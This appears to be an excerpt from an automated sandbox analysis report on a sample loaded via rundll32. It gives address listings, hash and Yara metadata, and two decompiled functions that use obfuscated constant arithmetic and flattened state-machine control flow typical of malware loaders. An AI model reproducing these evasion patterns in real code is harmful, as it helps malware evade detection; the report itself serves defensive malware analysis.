                                                                                                                      0x00179444
                                                                                                                      0x00179457
                                                                                                                      0x001793e8
                                                                                                                      0x001793e8
                                                                                                                      0x00179339
                                                                                                                      0x00179339
                                                                                                                      0x0017933b
                                                                                                                      0x0017933b
                                                                                                                      0x00000000
                                                                                                                      0x0017933b
                                                                                                                      0x00179339
                                                                                                                      0x00179446
                                                                                                                      0x00179339
                                                                                                                      0x00179339
                                                                                                                      0x0017933b
                                                                                                                      0x0017933b
                                                                                                                      0x00000000
                                                                                                                      0x0017933b
                                                                                                                      0x00000000
                                                                                                                      0x00179339
                                                                                                                      0x00179359
                                                                                                                      0x00179420
                                                                                                                      0x00179425
                                                                                                                      0x00179438
                                                                                                                      0x00000000
                                                                                                                      0x00179438
                                                                                                                      0x00179427
                                                                                                                      0x00000000
                                                                                                                      0x00179427
                                                                                                                      0x00179365
                                                                                                                      0x0017940e
                                                                                                                      0x00179413
                                                                                                                      0x00179416
                                                                                                                      0x00000000
                                                                                                                      0x00179416
                                                                                                                      0x00179371
                                                                                                                      0x001793c9
                                                                                                                      0x001793ce
                                                                                                                      0x001793e3
                                                                                                                      0x00000000
                                                                                                                      0x001793e3
                                                                                                                      0x001793d0
                                                                                                                      0x00000000
                                                                                                                      0x001793d0
                                                                                                                      0x00179379
                                                                                                                      0x001793b2
                                                                                                                      0x001793b7
                                                                                                                      0x001793ba
                                                                                                                      0x001793bc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001793c2
                                                                                                                      0x001793c2
                                                                                                                      0x00000000
                                                                                                                      0x001793c2
                                                                                                                      0x00179381
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00179389
                                                                                                                      0x0017938e
                                                                                                                      0x0017938e
                                                                                                                      0x00000000
                                                                                                                      0x00179496
                                                                                                                      0x00179496
                                                                                                                      0x0017949c
                                                                                                                      0x00179591
                                                                                                                      0x00179596
                                                                                                                      0x001795a9
                                                                                                                      0x001795ae
                                                                                                                      0x00000000
                                                                                                                      0x001795ae
                                                                                                                      0x00179598
                                                                                                                      0x00000000
                                                                                                                      0x00179598
                                                                                                                      0x001794a2
                                                                                                                      0x001794a8
                                                                                                                      0x00179556
                                                                                                                      0x00179557
                                                                                                                      0x0017955a
                                                                                                                      0x00179560
                                                                                                                      0x00179564
                                                                                                                      0x00179566
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00179573
                                                                                                                      0x00179578
                                                                                                                      0x0017957f
                                                                                                                      0x00179589
                                                                                                                      0x00000000
                                                                                                                      0x00179589
                                                                                                                      0x001794ae
                                                                                                                      0x001794b4
                                                                                                                      0x00179526
                                                                                                                      0x0017952b
                                                                                                                      0x00179540
                                                                                                                      0x00000000
                                                                                                                      0x00179540
                                                                                                                      0x0017952d
                                                                                                                      0x00000000
                                                                                                                      0x0017952d
                                                                                                                      0x001794b6
                                                                                                                      0x001794bc
                                                                                                                      0x0017950a
                                                                                                                      0x0017950f
                                                                                                                      0x0017951c
                                                                                                                      0x0017951c
                                                                                                                      0x00000000
                                                                                                                      0x0017950f
                                                                                                                      0x001794be
                                                                                                                      0x001794c0
                                                                                                                      0x001794f0
                                                                                                                      0x001794f6
                                                                                                                      0x001794fd
                                                                                                                      0x001794ff
                                                                                                                      0x00000000
                                                                                                                      0x001794ff
                                                                                                                      0x001794c2
                                                                                                                      0x001794c8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001794ce
                                                                                                                      0x001794d3
                                                                                                                      0x001794e6
                                                                                                                      0x00000000
                                                                                                                      0x001794e6
                                                                                                                      0x001794d5
                                                                                                                      0x001794d5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0\$Arn$n?
                                                                                                                      • API String ID: 0-1422779782
                                                                                                                      • Opcode ID: f8df196ffc9c9da02b775e68e72b20e381b6211da6489bab2dec14610818aed7
                                                                                                                      • Instruction ID: 454aa81c70a1aee00ae99c70d779b139d7dd35a5c73b46b469e18d6b41ea013f
                                                                                                                      • Opcode Fuzzy Hash: f8df196ffc9c9da02b775e68e72b20e381b6211da6489bab2dec14610818aed7
                                                                                                                      • Instruction Fuzzy Hash: 3BB17670508381DBC368DF24C59A52FBBF1FBD4358F548A1EF68A962A0D7709A48CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017BD0F Relevance: 4.0, Strings: 3, Instructions: 247COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0017BD0F(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v16;
				intOrPtr _v48;
				char _v52;
				char _v68;
				char _v76;
				signed int _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				void* _t208;
				signed int _t226;
				char* _t228;
				signed int _t229;
				void* _t231;
				signed int _t234;
				intOrPtr _t242;
				intOrPtr* _t247;
				void* _t249;
				intOrPtr _t250;
				void* _t289;
				intOrPtr* _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int* _t301;

				_t291 = _a4;
				_t247 = __ecx;
				_push(_a8);
				_push(_t291);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t208);
				_v132 = 0x7182e5;
				_t301 =  &(( &_v156)[4]);
				_v132 = _v132 + 0x26fa;
				_t289 = 0;
				_t249 = 0xa47caa1;
				_t292 = 0x79;
				_v132 = _v132 / _t292;
				_t293 = 0x16;
				_v132 = _v132 / _t293;
				_v132 = _v132 ^ 0x00000aee;
				_v140 = 0x29ca9c;
				_v140 = _v140 + 0x24a5;
				_v140 = _v140 << 5;
				_v140 = _v140 + 0xffff55cc;
				_v140 = _v140 ^ 0x053d3dfc;
				_v136 = 0x4d5d35;
				_v136 = _v136 | 0x2dd38e58;
				_v136 = _v136 + 0xffffc96a;
				_v136 = _v136 | 0xcd817148;
				_v136 = _v136 ^ 0xedde351d;
				_v152 = 0x709b91;
				_t294 = 0x24;
				_v152 = _v152 / _t294;
				_v152 = _v152 | 0xc56f7625;
				_v152 = _v152 << 6;
				_v152 = _v152 ^ 0x5bd1c7f0;
				_v144 = 0x2195b1;
				_v144 = _v144 | 0x0c2b25b9;
				_v144 = _v144 << 8;
				_v144 = _v144 | 0x32a70c97;
				_v144 = _v144 ^ 0x3bb2e9a3;
				_v120 = 0x3a67b3;
				_v120 = _v120 + 0xffff86f2;
				_v120 = _v120 + 0xf6d6;
				_v120 = _v120 ^ 0x00358b42;
				_v108 = 0x732c66;
				_t68 =  &_v108; // 0x732c66
				_t295 = 0x35;
				_v108 =  *_t68 / _t295;
				_v108 = _v108 << 0xb;
				_v108 = _v108 ^ 0x11669525;
				_v156 = 0x38089d;
				_v156 = _v156 ^ 0x13a0f5b7;
				_v156 = _v156 | 0xc9f1c7ca;
				_v156 = _v156 << 0xf;
				_v156 = _v156 ^ 0xfffe1365;
				_v128 = 0x743938;
				_v128 = _v128 ^ 0xec4d11e9;
				_v128 = _v128 | 0xa250e655;
				_v128 = _v128 * 0x41;
				_v128 = _v128 ^ 0x8cf42415;
				_v100 = 0x6d926d;
				_t296 = 0x34;
				_v100 = _v100 / _t296;
				_v100 = _v100 ^ 0x000eb1c4;
				_v116 = 0xefa621;
				_v116 = _v116 + 0xffff82bb;
				_t297 = 0x3d;
				_v116 = _v116 * 0x32;
				_v116 = _v116 ^ 0x2eb07dcc;
				_v88 = 0x5b377;
				_v88 = _v88 + 0x8d9;
				_v88 = _v88 ^ 0x00067740;
				_v112 = 0x4d19ae;
				_v112 = _v112 ^ 0x630c5599;
				_v112 = _v112 ^ 0xe5b09bfb;
				_v112 = _v112 ^ 0x86f4ef46;
				_v148 = 0x4966c6;
				_v148 = _v148 / _t297;
				_v148 = _v148 << 1;
				_v148 = _v148 ^ 0x19f6490a;
				_v148 = _v148 ^ 0x19fea643;
				_v104 = 0x4e28a7;
				_v104 = _v104 ^ 0x0c2039e4;
				_t298 = 0x43;
				_v104 = _v104 / _t298;
				_v104 = _v104 ^ 0x002b1fa2;
				_v96 = 0xfd59a6;
				_v96 = _v96 ^ 0x1da99ba6;
				_v96 = _v96 ^ 0x1d58c7ea;
				_v92 = 0x8125dc;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x409d3f45;
				_v124 = 0x45818f;
				_v124 = _v124 ^ 0x2c821393;
				_v124 = _v124 << 0xc;
				_v124 = _v124 + 0x7cf7;
				_v124 = _v124 ^ 0x792e1e67;
				do {
					while(_t249 != 0x4baccf8) {
						if(_t249 == 0x7c30f3d) {
							_t231 = E001864F1( &_v52, _v156,  &_v16, _v128);
							_pop(_t254);
							if(_t231 != 0) {
								_push(_t254);
								_t242 = E00183512(_v48);
								 *_t291 = _t242;
								if(_t242 != 0) {
									E0018FD29(_v52, _v112,  *_t291, _v148, _v48);
									_t301 =  &(_t301[3]);
									 *((intOrPtr*)(_t291 + 4)) = _v48;
									_t289 = 1;
								}
							}
							_t249 = 0xf7122fc;
							continue;
						}
						if(_t249 == 0x9cf6742) {
							_t234 = E001904DE(_v144, _v120,  &_v76,  &_v68, _v108);
							_t301 =  &(_t301[3]);
							asm("sbb ecx, ecx");
							_t249 = ( ~_t234 & 0xf851ec41) + 0xf7122fc;
							continue;
						}
						if(_t249 == 0xa47caa1) {
							_t249 = 0x4baccf8;
							continue;
						}
						if(_t249 == 0xbfbcb36) {
							if(E0018CC89( &_v76,  &_v84, _v152) == 0) {
								L8:
								return _t289;
							}
							_t249 = 0x9cf6742;
							continue;
						}
						if(_t249 != 0xf7122fc) {
							goto L25;
						}
						E001768DE(_v104, _v96, _v92, _v124, _v76);
						goto L8;
					}
					_t226 =  *((intOrPtr*)(_t247 + 4));
					_t250 =  *_t247;
					_v80 = _t226;
					_v84 = _t250;
					_t228 = _t226 - 1 + _t250;
					while(_t228 > _t250) {
						if( *_t228 == 0) {
							break;
						}
						_t228 = _t228 - 1;
					}
					_t229 = _t228 - _t250;
					_v80 = _t229;
					if(_t229 == 0) {
						L24:
						_t249 = 0xbfbcb36;
						goto L25;
					}
					while(_v80 % _v140 != _v132) {
						_t206 =  &_v80;
						 *_t206 = _v80 - 1;
						if( *_t206 != 0) {
							continue;
						}
						goto L24;
					}
					goto L24;
					L25:
				} while (_t249 != 0x4e0187e);
				goto L8;
			}
















































                                                                                                                      0x0017bd18
                                                                                                                      0x0017bd1f
                                                                                                                      0x0017bd22
                                                                                                                      0x0017bd29
                                                                                                                      0x0017bd2a
                                                                                                                      0x0017bd2b
                                                                                                                      0x0017bd2c
                                                                                                                      0x0017bd31
                                                                                                                      0x0017bd39
                                                                                                                      0x0017bd3c
                                                                                                                      0x0017bd4a
                                                                                                                      0x0017bd4c
                                                                                                                      0x0017bd53
                                                                                                                      0x0017bd58
                                                                                                                      0x0017bd62
                                                                                                                      0x0017bd67
                                                                                                                      0x0017bd6d
                                                                                                                      0x0017bd75
                                                                                                                      0x0017bd7d
                                                                                                                      0x0017bd85
                                                                                                                      0x0017bd8a
                                                                                                                      0x0017bd92
                                                                                                                      0x0017bd9a
                                                                                                                      0x0017bda2
                                                                                                                      0x0017bdaa
                                                                                                                      0x0017bdb2
                                                                                                                      0x0017bdba
                                                                                                                      0x0017bdc2
                                                                                                                      0x0017bdce
                                                                                                                      0x0017bdd3
                                                                                                                      0x0017bdd9
                                                                                                                      0x0017bde1
                                                                                                                      0x0017bde6
                                                                                                                      0x0017bdee
                                                                                                                      0x0017bdf6
                                                                                                                      0x0017bdfe
                                                                                                                      0x0017be03
                                                                                                                      0x0017be0b
                                                                                                                      0x0017be13
                                                                                                                      0x0017be1b
                                                                                                                      0x0017be23
                                                                                                                      0x0017be2b
                                                                                                                      0x0017be33
                                                                                                                      0x0017be3b
                                                                                                                      0x0017be3f
                                                                                                                      0x0017be42
                                                                                                                      0x0017be46
                                                                                                                      0x0017be4b
                                                                                                                      0x0017be53
                                                                                                                      0x0017be5b
                                                                                                                      0x0017be63
                                                                                                                      0x0017be6b
                                                                                                                      0x0017be70
                                                                                                                      0x0017be78
                                                                                                                      0x0017be80
                                                                                                                      0x0017be88
                                                                                                                      0x0017be95
                                                                                                                      0x0017be99
                                                                                                                      0x0017bea3
                                                                                                                      0x0017beb1
                                                                                                                      0x0017beb6
                                                                                                                      0x0017bebc
                                                                                                                      0x0017bec4
                                                                                                                      0x0017becc
                                                                                                                      0x0017bed9
                                                                                                                      0x0017bedc
                                                                                                                      0x0017bee0
                                                                                                                      0x0017bee8
                                                                                                                      0x0017bef0
                                                                                                                      0x0017bef8
                                                                                                                      0x0017bf00
                                                                                                                      0x0017bf08
                                                                                                                      0x0017bf10
                                                                                                                      0x0017bf18
                                                                                                                      0x0017bf20
                                                                                                                      0x0017bf30
                                                                                                                      0x0017bf34
                                                                                                                      0x0017bf38
                                                                                                                      0x0017bf40
                                                                                                                      0x0017bf48
                                                                                                                      0x0017bf50
                                                                                                                      0x0017bf5c
                                                                                                                      0x0017bf64
                                                                                                                      0x0017bf68
                                                                                                                      0x0017bf70
                                                                                                                      0x0017bf78
                                                                                                                      0x0017bf80
                                                                                                                      0x0017bf88
                                                                                                                      0x0017bf90
                                                                                                                      0x0017bf95
                                                                                                                      0x0017bf9d
                                                                                                                      0x0017bfa5
                                                                                                                      0x0017bfad
                                                                                                                      0x0017bfb2
                                                                                                                      0x0017bfba
                                                                                                                      0x0017bfc2
                                                                                                                      0x0017bfc2
                                                                                                                      0x0017bfd4
                                                                                                                      0x0017c09b
                                                                                                                      0x0017c0a1
                                                                                                                      0x0017c0a4
                                                                                                                      0x0017c0b3
                                                                                                                      0x0017c0bb
                                                                                                                      0x0017c0c0
                                                                                                                      0x0017c0c6
                                                                                                                      0x0017c0dd
                                                                                                                      0x0017c0eb
                                                                                                                      0x0017c0ee
                                                                                                                      0x0017c0f1
                                                                                                                      0x0017c0f1
                                                                                                                      0x0017c0c6
                                                                                                                      0x0017c0f2
                                                                                                                      0x00000000
                                                                                                                      0x0017c0f2
                                                                                                                      0x0017bfe0
                                                                                                                      0x0017c069
                                                                                                                      0x0017c06e
                                                                                                                      0x0017c075
                                                                                                                      0x0017c07d
                                                                                                                      0x00000000
                                                                                                                      0x0017c07d
                                                                                                                      0x0017bfe8
                                                                                                                      0x0017c049
                                                                                                                      0x00000000
                                                                                                                      0x0017c049
                                                                                                                      0x0017bff0
                                                                                                                      0x0017c03d
                                                                                                                      0x0017c016
                                                                                                                      0x0017c022
                                                                                                                      0x0017c022
                                                                                                                      0x0017c03f
                                                                                                                      0x00000000
                                                                                                                      0x0017c03f
                                                                                                                      0x0017bff4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017c00e
                                                                                                                      0x00000000
                                                                                                                      0x0017c013
                                                                                                                      0x0017c0f9
                                                                                                                      0x0017c0fc
                                                                                                                      0x0017c0fe
                                                                                                                      0x0017c103
                                                                                                                      0x0017c107
                                                                                                                      0x0017c111
                                                                                                                      0x0017c10e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017c110
                                                                                                                      0x0017c110
                                                                                                                      0x0017c115
                                                                                                                      0x0017c117
                                                                                                                      0x0017c11b
                                                                                                                      0x0017c135
                                                                                                                      0x0017c135
                                                                                                                      0x00000000
                                                                                                                      0x0017c135
                                                                                                                      0x0017c11d
                                                                                                                      0x0017c12f
                                                                                                                      0x0017c12f
                                                                                                                      0x0017c133
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017c133
                                                                                                                      0x00000000
                                                                                                                      0x0017c13a
                                                                                                                      0x0017c13a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5]M$89t$f,s
                                                                                                                      • API String ID: 0-187558970
                                                                                                                      • Opcode ID: b8f6f788a1341fb326c7f6acff40e4f4ddc65e0342340909664983d1fd6761a5
                                                                                                                      • Instruction ID: bdf851ffa5afb06f50b6f40772be529044e137a4680bef89ca840ab122b4ea7c
                                                                                                                      • Opcode Fuzzy Hash: b8f6f788a1341fb326c7f6acff40e4f4ddc65e0342340909664983d1fd6761a5
                                                                                                                      • Instruction Fuzzy Hash: B9B14571508380DFC358CF25C89951BBBF1FBC8358F408A2DF59A96260D7B59A49CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00173FB8 Relevance: 4.0, Strings: 3, Instructions: 243COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00173FB8() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				void* _t262;
				intOrPtr _t274;
				void* _t279;
				intOrPtr _t281;
				intOrPtr _t283;
				signed int _t305;
				signed int _t306;
				signed int* _t309;

				_t309 =  &_v1172;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t279 = 0xa0c284c;
				_v1056 = 0xafe7d9;
				_v1052 = 0x960b65;
				_v1120 = 0x40f49c;
				_v1120 = _v1120 + 0xc807;
				_v1120 = _v1120 * 0x4f;
				_v1120 = _v1120 ^ 0x1446f881;
				_v1116 = 0x6254e6;
				_t305 = 3;
				_v1116 = _v1116 * 5;
				_v1116 = _v1116 + 0xcc41;
				_v1116 = _v1116 ^ 0x01ee9a48;
				_v1104 = 0xc01800;
				_v1104 = _v1104 | 0x48a752a3;
				_v1104 = _v1104 ^ 0x48e65f13;
				_v1128 = 0x7c2fed;
				_v1128 = _v1128 | 0x2c3c97c8;
				_v1128 = _v1128 * 0x77;
				_v1128 = _v1128 ^ 0xadff29d3;
				_v1136 = 0x195939;
				_v1136 = _v1136 + 0xfffffbae;
				_v1136 = _v1136 * 0x49;
				_v1136 = _v1136 ^ 0x073ad8c6;
				_v1168 = 0xbc4bb5;
				_v1168 = _v1168 / _t305;
				_v1168 = _v1168 << 0xd;
				_v1168 = _v1168 ^ 0xd1f3631f;
				_v1168 = _v1168 ^ 0x0980812e;
				_v1084 = 0x2affe9;
				_v1084 = _v1084 >> 0xd;
				_v1084 = _v1084 ^ 0x00075e3f;
				_v1112 = 0x7143ab;
				_v1112 = _v1112 >> 0xb;
				_t306 = 0x4a;
				_v1112 = _v1112 / _t306;
				_v1112 = _v1112 ^ 0x000905fb;
				_v1100 = 0xf39387;
				_v1100 = _v1100 + 0xffffb245;
				_v1100 = _v1100 ^ 0x00f5952a;
				_v1160 = 0xdc501f;
				_v1160 = _v1160 >> 0xb;
				_v1160 = _v1160 | 0xffab4649;
				_v1160 = _v1160 * 0x4a;
				_v1160 = _v1160 ^ 0xe7809492;
				_v1076 = 0x9b6a27;
				_v1076 = _v1076 >> 9;
				_v1076 = _v1076 ^ 0x0000c221;
				_v1132 = 0x7dd85e;
				_v1132 = _v1132 + 0xffff3c07;
				_v1132 = _v1132 ^ 0x5ccf103a;
				_v1132 = _v1132 ^ 0x5cb197cc;
				_v1060 = 0x3a660e;
				_v1060 = _v1060 ^ 0x9c30fae7;
				_v1060 = _v1060 ^ 0x9c0496c9;
				_v1124 = 0xd6fa60;
				_v1124 = _v1124 >> 0xc;
				_v1124 = _v1124 * 0x63;
				_v1124 = _v1124 ^ 0x0000f3a0;
				_v1088 = 0xffa7cd;
				_v1088 = _v1088 ^ 0xcc4f33e8;
				_v1088 = _v1088 ^ 0xccbde027;
				_v1096 = 0xc2302a;
				_v1096 = _v1096 ^ 0x3cf81aba;
				_v1096 = _v1096 ^ 0x3c3bc632;
				_v1064 = 0x2b9d03;
				_v1064 = _v1064 + 0xffffce76;
				_v1064 = _v1064 ^ 0x0029f92b;
				_v1164 = 0x820e56;
				_v1164 = _v1164 >> 0xd;
				_v1164 = _v1164 + 0xa8ad;
				_v1164 = _v1164 | 0xfa0f2dae;
				_v1164 = _v1164 ^ 0xfa046831;
				_v1068 = 0x2883d9;
				_v1068 = _v1068 + 0xffff633a;
				_v1068 = _v1068 ^ 0x0026d05d;
				_v1156 = 0x6f33fd;
				_v1156 = _v1156 << 0xe;
				_v1156 = _v1156 + 0xfcd0;
				_v1156 = _v1156 + 0x75bd;
				_v1156 = _v1156 ^ 0xcd0f8dab;
				_v1172 = 0xb8c1fe;
				_v1172 = _v1172 << 6;
				_v1172 = _v1172 * 0x6a;
				_v1172 = _v1172 << 4;
				_v1172 = _v1172 ^ 0x014ff662;
				_v1148 = 0xbed93a;
				_v1148 = _v1148 * 0x3e;
				_v1148 = _v1148 << 0xa;
				_v1148 = _v1148 ^ 0x5e071c48;
				_v1148 = _v1148 ^ 0xbc7b36e3;
				_v1092 = 0x46d8d3;
				_v1092 = _v1092 << 5;
				_v1092 = _v1092 ^ 0x08d1099a;
				_v1140 = 0x5a5c4c;
				_v1140 = _v1140 ^ 0xa959b0b3;
				_v1140 = _v1140 << 3;
				_v1140 = _v1140 ^ 0x481958d7;
				_v1080 = 0xac3d63;
				_v1080 = _v1080 * 0x50;
				_v1080 = _v1080 ^ 0x35d8e2dc;
				_v1152 = 0x840294;
				_v1152 = _v1152 + 0xffff0ee6;
				_v1152 = _v1152 ^ 0xf9fb415c;
				_v1152 = _v1152 | 0x82095beb;
				_v1152 = _v1152 ^ 0xfb725375;
				_v1072 = 0xb67c6d;
				_v1072 = _v1072 + 0xffffc0d8;
				_v1072 = _v1072 ^ 0x00b2e767;
				_v1144 = 0x5c5bd3;
				_v1144 = _v1144 ^ 0x420c1b91;
				_v1144 = _v1144 * 0x79;
				_v1144 = _v1144 >> 9;
				_v1144 = _v1144 ^ 0x002d898c;
				_v1108 = 0xefd7e6;
				_v1108 = _v1108 * 0x73;
				_v1108 = _v1108 * 0x61;
				_v1108 = _v1108 ^ 0xd2fa3683;
				do {
					while(_t279 != 0x10bc038) {
						if(_t279 == 0x5d7fb4e) {
							E001841A7();
							L11:
							_t279 = 0x10bc038;
							continue;
						}
						if(_t279 == 0x666e3d5) {
							E001744FA( &_v520, _v1064, _v1164, _v1068, _v1156);
							_push( &_v1040);
							_push( &_v520);
							_push(_v1092);
							E00178D95(_v1172, _v1148, __eflags);
							_t309 =  &(_t309[6]);
							_t279 = 0xe0c3523;
							continue;
						}
						if(_t279 == 0x90d07ee) {
							_t274 = E001804B8();
							goto L11;
						}
						if(_t279 == 0xa0c284c) {
							_t274 =  *0x19520c; // 0x0
							__eflags =  *((intOrPtr*)(_t274 + 0x438));
							_t279 =  !=  ? 0x90d07ee : 0x5d7fb4e;
							continue;
						}
						if(_t279 != 0xe0c3523) {
							goto L15;
						}
						 *((short*)(E00184FA8(_v1140,  &_v1040, _v1080, _v1152))) = 0;
						return E00175B6B(_v1072, _v1144,  &_v1040, _v1108);
					}
					_push(_v1112);
					_push(_v1084);
					_push(0x1710cc);
					_t262 = E0017AB66(_v1136, _v1168, __eflags);
					_t281 =  *0x19520c; // 0x0
					_t283 =  *0x19520c; // 0x0
					__eflags = _t283 + 8;
					E0017E7CE(_t262, _t283 + 8, _v1100, _t283 + 8, _t281 + 0x220, _v1160, _v1076, _v1132, _v1060, _t281 + 0x220);
					E0017AE03(_v1124, _v1088, _v1096, _t262);
					_t309 =  &(_t309[0xd]);
					_t279 = 0x666e3d5;
					L15:
					__eflags = _t279 - 0xfda68b3;
				} while (__eflags != 0);
				return _t274;
			}














































                                                                                                                      0x00173fb8
                                                                                                                      0x00173fbe
                                                                                                                      0x00173fc5
                                                                                                                      0x00173fcd
                                                                                                                      0x00173fd2
                                                                                                                      0x00173fda
                                                                                                                      0x00173fe2
                                                                                                                      0x00173fea
                                                                                                                      0x00173ffb
                                                                                                                      0x00173fff
                                                                                                                      0x00174007
                                                                                                                      0x00174016
                                                                                                                      0x00174019
                                                                                                                      0x0017401d
                                                                                                                      0x00174025
                                                                                                                      0x0017402d
                                                                                                                      0x00174035
                                                                                                                      0x0017403d
                                                                                                                      0x00174045
                                                                                                                      0x0017404d
                                                                                                                      0x0017405a
                                                                                                                      0x0017405e
                                                                                                                      0x00174066
                                                                                                                      0x0017406e
                                                                                                                      0x0017407b
                                                                                                                      0x0017407f
                                                                                                                      0x00174087
                                                                                                                      0x00174097
                                                                                                                      0x0017409b
                                                                                                                      0x001740a0
                                                                                                                      0x001740a8
                                                                                                                      0x001740b0
                                                                                                                      0x001740b8
                                                                                                                      0x001740bd
                                                                                                                      0x001740c5
                                                                                                                      0x001740cd
                                                                                                                      0x001740d6
                                                                                                                      0x001740d9
                                                                                                                      0x001740dd
                                                                                                                      0x001740e5
                                                                                                                      0x001740ed
                                                                                                                      0x001740f5
                                                                                                                      0x001740fd
                                                                                                                      0x00174105
                                                                                                                      0x0017410a
                                                                                                                      0x00174117
                                                                                                                      0x0017411b
                                                                                                                      0x00174123
                                                                                                                      0x0017412b
                                                                                                                      0x00174130
                                                                                                                      0x00174138
                                                                                                                      0x00174140
                                                                                                                      0x00174148
                                                                                                                      0x00174150
                                                                                                                      0x00174158
                                                                                                                      0x00174163
                                                                                                                      0x0017416e
                                                                                                                      0x00174179
                                                                                                                      0x00174181
                                                                                                                      0x0017418b
                                                                                                                      0x0017418f
                                                                                                                      0x00174197
                                                                                                                      0x0017419f
                                                                                                                      0x001741a7
                                                                                                                      0x001741af
                                                                                                                      0x001741bc
                                                                                                                      0x001741c9
                                                                                                                      0x001741d6
                                                                                                                      0x001741de
                                                                                                                      0x001741e6
                                                                                                                      0x001741ee
                                                                                                                      0x001741f6
                                                                                                                      0x001741fb
                                                                                                                      0x00174203
                                                                                                                      0x0017420b
                                                                                                                      0x00174213
                                                                                                                      0x0017421b
                                                                                                                      0x00174223
                                                                                                                      0x0017422b
                                                                                                                      0x00174233
                                                                                                                      0x00174238
                                                                                                                      0x00174240
                                                                                                                      0x00174248
                                                                                                                      0x00174250
                                                                                                                      0x00174258
                                                                                                                      0x00174262
                                                                                                                      0x00174266
                                                                                                                      0x0017426b
                                                                                                                      0x00174273
                                                                                                                      0x00174280
                                                                                                                      0x00174284
                                                                                                                      0x00174289
                                                                                                                      0x00174291
                                                                                                                      0x00174299
                                                                                                                      0x001742a1
                                                                                                                      0x001742a6
                                                                                                                      0x001742ae
                                                                                                                      0x001742b6
                                                                                                                      0x001742be
                                                                                                                      0x001742c3
                                                                                                                      0x001742cb
                                                                                                                      0x001742d8
                                                                                                                      0x001742dc
                                                                                                                      0x001742e4
                                                                                                                      0x001742ec
                                                                                                                      0x001742f4
                                                                                                                      0x001742fc
                                                                                                                      0x00174304
                                                                                                                      0x0017430c
                                                                                                                      0x00174314
                                                                                                                      0x0017431c
                                                                                                                      0x00174324
                                                                                                                      0x0017432c
                                                                                                                      0x00174339
                                                                                                                      0x0017433d
                                                                                                                      0x00174342
                                                                                                                      0x0017434a
                                                                                                                      0x00174357
                                                                                                                      0x00174360
                                                                                                                      0x00174364
                                                                                                                      0x0017436c
                                                                                                                      0x0017436c
                                                                                                                      0x00174376
                                                                                                                      0x00174466
                                                                                                                      0x0017440a
                                                                                                                      0x0017440a
                                                                                                                      0x00000000
                                                                                                                      0x0017440a
                                                                                                                      0x00174382
                                                                                                                      0x0017442b
                                                                                                                      0x00174437
                                                                                                                      0x0017443f
                                                                                                                      0x00174440
                                                                                                                      0x0017444c
                                                                                                                      0x00174451
                                                                                                                      0x00174454
                                                                                                                      0x00000000
                                                                                                                      0x00174454
                                                                                                                      0x0017438a
                                                                                                                      0x00174405
                                                                                                                      0x00000000
                                                                                                                      0x00174405
                                                                                                                      0x00174392
                                                                                                                      0x001743e7
                                                                                                                      0x001743ee
                                                                                                                      0x001743f5
                                                                                                                      0x00000000
                                                                                                                      0x001743f5
                                                                                                                      0x0017439a
